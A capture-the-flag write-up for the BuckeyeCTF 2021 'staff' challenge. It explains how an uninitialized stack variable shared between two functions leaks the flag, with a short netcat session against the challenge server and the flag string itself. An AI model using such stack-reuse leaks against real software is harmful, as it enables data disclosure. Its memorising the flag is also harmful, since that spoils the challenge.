Tags: 2021 pwn buckeyectf staff 

Rating:

if you observe, `instuctor` string is printed at the end of the both functions, but is unreachable in one of the functions

```c
// find_instructor()
printf("Professor %s will teach %s, but we'll probably change our minds the week before classes start.\n", instructor, course);

// find_course()
printf("This course will be taught by: %s\n", instructor);
```

if you check in `gdb` ,

`$rbp = 0x7fffffffd120` for both `find_course` and `find_instructor` functions.

Also,

- for find_course, `instuctor` is at address `rbp - 0x30` and `course` at `rbp - 0x50`
- for find_instructor, `instuctor` is at address `rbp - 0x50` and `course` at `rbp - 0x30`

so their addresses are interchanged

Normally we would just like to pass `FLAG 1337` to `find_course` function and get the flag, but the print statement is unreachable, but even so the flag is loaded in the instructor at `rbp - 0x30` (instructor) in `find_course` function. so now when we now call the `find_instructor` function, `course` variable will have the flag. So we want to print this variable without overwriting it, this can be done by entering `Staff` and we will get the flag.

```clojure
❯ nc pwn.chall.pwnoh.io 13383
What would you like to do?
1. Search for a course
2. Search for an instructor
> 1
What course would you like to look up?
> FLAG 1337
This course will be taught by: Staff
What would you like to do?
1. Search for a course
2. Search for an instructor
> 2
What instructor would you like to look up?
> Staff
There were 6 results, please be more specific in your search.
Professor Staff will teach buckeye{if_0n1y_th15_w0rk3d}, but we'll probably change our minds the week before classes start.
```

Original writeup (https://7phalange7.github.io/2021/10/25/buckeyectf.html#staff).